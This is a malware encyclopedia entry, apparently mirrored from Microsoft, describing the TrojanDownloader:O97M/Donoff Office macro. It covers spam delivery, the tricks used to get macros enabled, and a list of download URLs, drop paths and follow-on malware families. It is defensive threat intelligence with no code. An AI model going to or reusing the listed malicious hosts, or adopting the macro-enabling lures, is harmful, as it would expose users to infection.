SecurityHome.eu TrojanDownloader:O97M/Donoff

Home / malware PDF

TrojanDownloader:O97M/Donoff

First posted on 15 February 2019.
Source: Microsoft
Aliases :
There are no other names known for TrojanDownloader:O97M/Donoff.
Explanation :
Installation

This threat is a malicious macro script for Microsoft Office files. The macro can download and run other malware on your PC.

It can be installed when you open a malicious attachment to a spam email. For example, we have seen this threat attached to the following spam emails in a Word document (.doc file):

Payload

Downloads other malware

The infected .doc files contain a malicious macro script that, when opened, can download and run other malware onto your PC.

The malware uses social engineering tactics to try to get you to enable macro scripting when you view the document, as macro scripts are usually disabled by default in Microsoft Office.

We have seen the malware uses the following fake warnings in an attempt to get you to enable macros:

Once macros are enabled we have seen this threat contact the following URLs to download files, including malware:

adobe-support.us/.exe bringbackourgals.biz/php//ken.exe bustedrubberbabies.com/js/.exe chinamanwoody.com/.php chopsecurity.ru/microsoft/word/.com climate54.ru/modules/mod_araticlhess/.php colfdoc.it/cart/.exe dhanophan.co.th/js/.exe getimgdcenter.ru/.png goldriverlinedancers.nl/components/dancers/.exe goo.gl/ iloveberniemovie.ru/.png internetincomeengine.net/.exe joeniclesd.hostingsiteforfree.com/.exe legendarydownloads.com/.exe managercomponent.usa.cc/errors/.0.exe offshorebags.asia/.exe omc.hostingsiteforfree.com/.exe papeleriaelcid.com/aurora/ajax/.exe rghost.net/download/57465888/967d4c206f2a944160ffcc0f2b889f90a506653d/.exe s1.directxex.net/uploads/ socialnetchat.tk/uch/.exe u.to/

The downloaded malware is saved to the following locations:

%APPDATA% fdataupdate.com %APPDATA% VTAYOVKKIET.exe %TEMP% 1101.exe %TEMP% 8fvk.exe %TEMP% enu.exe %TEMP% HZLAFFLTDDO.exe %TEMP% msml.exe %TEMP% NYHEFLJDPZR.exe %TEMP% sentinel.exe %TEMP% xml.exe %USERPROFILE% EPGRE.exe %USERPROFILE% fkjhlkj23.com %USERPROFILE% SHIPA.exe C:JGSNUWKJRFC.exe

We have seen the following threats being downloaded:

Backdoor:Win32/Fynloski.A Ransom:MSIL/Swappa.A Ransom:Win32/Teerac.A TrojanDownloader:Win32/Drixed.A Worm:Win32/Gamarue

Analysis by Ric Robielos
Last update 15 February 2019

TOP

Malware :

Last 20